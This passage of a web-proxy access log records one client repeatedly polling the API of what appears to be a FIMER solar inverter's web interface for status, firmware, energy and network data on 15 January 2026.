[Client 37.76.46.26] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:21 +0000] - 204 204 - GET http fimer.profibot.hu "/v1/elc/config" [Client 37.76.46.26] [Length 0] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:21 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/timeseries/data/2235101218/grid/main/active_energy?start=1767225600000&end=1768517999999&bin=month_of_year&aggregation=diff" [Client 37.76.46.26] [Length 39] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:21 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 37.76.46.26] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:21 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/timeseries/data/2235101218/grid/main/active_energy?start=1767225600000&end=1768517999999&bin=yearly&aggregation=diff" [Client 37.76.46.26] [Length 39] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:22 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.46.26] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:22 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/events?pageSize=1000&pageOffset=0" [Client 37.76.46.26] [Length 233664] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:22 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/constant-multiple-data/2235101218" [Client 37.76.46.26] [Length 266] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:26 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.46.26] [Length 1674] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:26 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.46.26] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:26 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.46.26] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:26 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 37.76.46.26] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:26 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 37.76.46.26] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:31 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.46.26] [Length 1676] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:31 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.46.26] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:31 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/ping-logger" [Client 37.76.46.26] [Length 222] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:31 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.46.26] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:31 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 37.76.46.26] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:31 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.46.26] [Length 1676] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:31 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/backend/obj/state" [Client 37.76.46.26] [Length 9] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:31 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 37.76.46.26] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:32 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/wifi/status" [Client 37.76.46.26] [Length 374] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:32 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/eth/status" [Client 37.76.46.26] [Length 413] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:34 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.46.26] [Length 1671] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:34 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/timeseries/data/2235101218/grid/main/active_energy?start=1768089600000&end=1768517999999&bin=week_of_year&aggregation=diff" [Client 37.76.46.26] [Length 39] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:34 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/timeseries/data/2235101218/grid/main/active_energy?start=1767225600000&end=1768517999999&bin=month_of_year&aggregation=diff" [Client 37.76.46.26] [Length 39] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:34 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 37.76.46.26] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:34 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/timeseries/data/2235101218/grid/main/active_energy?start=1767225600000&end=1768517999999&bin=yearly&aggregation=diff" [Client 37.76.46.26] [Length 39] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:36 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.46.26] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:36 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.46.26] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:36 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 37.76.46.26] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:41 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.46.26] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:41 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.46.26] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:47 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/ping-logger" [Client 37.76.46.26] [Length 222] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:47 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.46.26] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:47 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.46.26] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:47 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/time_mgr/obj" [Client 37.76.46.26] [Length 81] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:47 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/backend/obj/state" [Client 37.76.46.26] [Length 9] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:47 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 37.76.46.26] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:47 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/autotest/status/CEI021" [Client 37.76.46.26] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:47 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/wifi/status" [Client 37.76.46.26] [Length 374] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:47 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/eth/status" [Client 37.76.46.26] [Length 413] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:51 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.46.26] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:51 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.46.26] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:56 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.46.26] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:56 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.46.26] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:50:56 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 37.76.46.26] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:01 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.46.26] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:01 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/ping-logger" [Client 37.76.46.26] [Length 222] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:01 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.46.26] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:01 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/backend/obj/state" [Client 37.76.46.26] [Length 9] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:01 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/wifi/status" [Client 37.76.46.26] [Length 374] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:01 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/eth/status" [Client 37.76.46.26] [Length 413] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:06 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.46.26] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:06 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.46.26] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:06 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 37.76.46.26] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:11 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.46.26] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:11 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.46.26] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:16 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.46.26] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:16 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/ping-logger" [Client 37.76.46.26] [Length 222] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:16 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.46.26] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:16 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/remote_upgrade/obj" [Client 37.76.46.26] [Length 60] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:16 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/time_mgr/obj" [Client 37.76.46.26] [Length 81] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:16 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/backend/obj/state" [Client 37.76.46.26] [Length 9] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:16 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 37.76.46.26] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:16 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/autotest/status/CEI021" [Client 37.76.46.26] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:16 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/wifi/status" [Client 37.76.46.26] [Length 374] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:16 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/eth/status" [Client 37.76.46.26] [Length 413] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:21 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.46.26] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:21 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.46.26] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:26 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.46.26] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:26 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.46.26] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:26 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 37.76.46.26] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:31 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.46.26] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:31 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/ping-logger" [Client 37.76.46.26] [Length 222] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:31 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.46.26] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:31 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/backend/obj/state" [Client 37.76.46.26] [Length 9] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:32 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/wifi/status" [Client 37.76.46.26] [Length 374] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:32 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/eth/status" [Client 37.76.46.26] [Length 413] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:36 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.46.26] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) 